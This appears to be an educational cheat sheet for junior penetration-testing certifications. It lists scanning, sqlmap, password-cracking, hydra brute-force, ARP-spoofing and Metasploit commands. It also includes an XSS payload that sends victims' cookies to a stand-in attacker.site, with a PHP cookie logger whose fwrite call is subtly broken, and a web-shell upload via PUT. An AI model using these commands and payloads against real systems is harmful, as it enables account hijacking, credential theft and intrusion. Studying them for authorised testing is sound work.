Introduction
There are lots of resources out there that can help you start in penetration testing. One of those resources is the WYWM potential platform among other junior penetration certifications. Recently I was able to certify as a junior penetration tester. I realized that at a junior level, there are not that many commands and tools that a junior penetration tester needs to know. In fact, I was able to summarize all the commands and tools in a form of a cheat sheet. These are the commands I use everyday and having this cheat sheet saves a lot of time. If you know all the commands/tools below, this cheat sheet will prepare you for your first junior penetration certification.
*Disclaimer
Penetration testing is a lot more than just throwing commands against a machine.
I would highly suggest before attempting to use these commands/tools for real-life engagements to have taken an ethical hacking course prior. Myself nor the company is responsible for the ill usage of these commands/tools, these are presented solely for educational purposes.
Also, before attempting any certification, you should practise all of these commands in some sort of a lab environment and understand how these tools/commands work together.
Let's begin!
Enumeration
Anyone who has done any type of penetration testing knows that enumeration is half the battle. Here are some of the techniques you should know.
Nmap Scans
nmap Scan (Full)
nmap -sC -sV -p- 10.10.10.10
nmap Scan (UDP Partial)
nmap -sU -sV 10.10.10.10
nmap Scan (Partial)
nmap -sC -sV 10.10.10.10
OS Detection
nmap -O 10.10.10.10
whois
whois site.com
Host Discovery
fping -a -g 10.10.10.0/24 2>/dev/null
nmap -sn 10.10.10.0/24 (to skip port scan phase)
netdiscover -r 10.10.10.0/24
Web Applications
The next set of commands should be used when attacking a web application. Actually understanding what these do and not just throwing them against your target, is really important.
Banner Grabbing
nc -v 10.10.10.10 <port#>
HEAD / HTTP/1.0
(press the enter key twice)
OpenSSL for HTTPS services
openssl s_client -connect 10.10.10.10:443
HEAD / HTTP/1.0
Cross Site Scripting (XSS)
<script>alert(‘xss’);</script>
<script>alert (document.cookie)</script>
<img src=”javascript:alert(1)”>
http://victim.site/search.php?find=<payload>
To send cookie to attacker-controlled site:
<script>
var i = new Image();
i.src=”http://attacker.site/log.php?q=”+document.cookie;
</script>
Log.php page on attacker’s site:
<?php
$filename=”/tmp/log.txt”;
$fp=fopen($filename, ‘a’);
$cookie=$_GET[‘q’];
$fwrite($fp, $cookie);
fclose($fp);
?>
HTTPRINT
Httprint -P0 -h 10.10.10.10 -s /path/to/signatirefile.txt
HTTP Verbs
GET, POST, HEAD, PUT, DELETE, OPTIONS
Using verb OPTIONS will show you what other verbs available
nc 10.10.10.10 80
OPTIONS / HTTP/1.0
To upload files using HTTP use the PUT verb as follows:
wc -m shell.php
The command above will give the size of the payload, then use the following:
PUT /shell.php
Content-type: text/html
Content-length: <payload size>
Directory and File Scanning
dirb http://10.10.10.10
dirsearch.py -u http://10.10.10.10 -e *
gobuster -u 10.10.10.10 -w /path/to/wordlist.txt
dirbuster
nikto -h 10.10.10.10
SQLMAP
sqlmap -u http://10.10.10.10 -p <parameter>
sqlmap -u http://10.10.10.10 --data POSTstring -p <parameter>
sqlmap -u http://10.10.10.10 --os-shell
sqlmap -u http://10.10.10.10 --dump
Order to use in:
#to identify database
sqlmap -u http://10.10.10.10 -dbs
#to identify tables
sqlmap -u http://10.10.10.10 -D <name of db> --tables
#to dump database
sqlmap -u http://10.10.10.10 -D <name of db> -T <name of table> --dump
System Attacks
This portion will cover system attacks, it is very important to understand how to execute brute force attacks and how to run exploits.
Password Attacks
unshadow /etc/passwd /etc/shadow > password.txt
john password.txt
john -show password.txt
Hash Cracking
john -wordlist /path/to/wordlist -users=users.txt hashfile
Brute Forcing with Hydra
hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh -s 22
hydra -L users.txt -P pass.txt telnet://10.10.10.10
ARP spoofing
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i tap0 -t 10.10.10.10 -r 10.10.10.11
Metasploit
search <name of exploit>
use <name of exploit>
info
show options, show advanced options
SET RHOST 10.10.10.10
SET payload <name of payload>
Exploit
background
sessions -l
sessions -i 1
ROUTING
I would practise your routing if you are planning to take any junior penetration tester certification. Here is a command to remember:
ip route add ROUTETO via ROUTEFROM
Example:
ip route add 10.10.10.10 via 192.168.0.1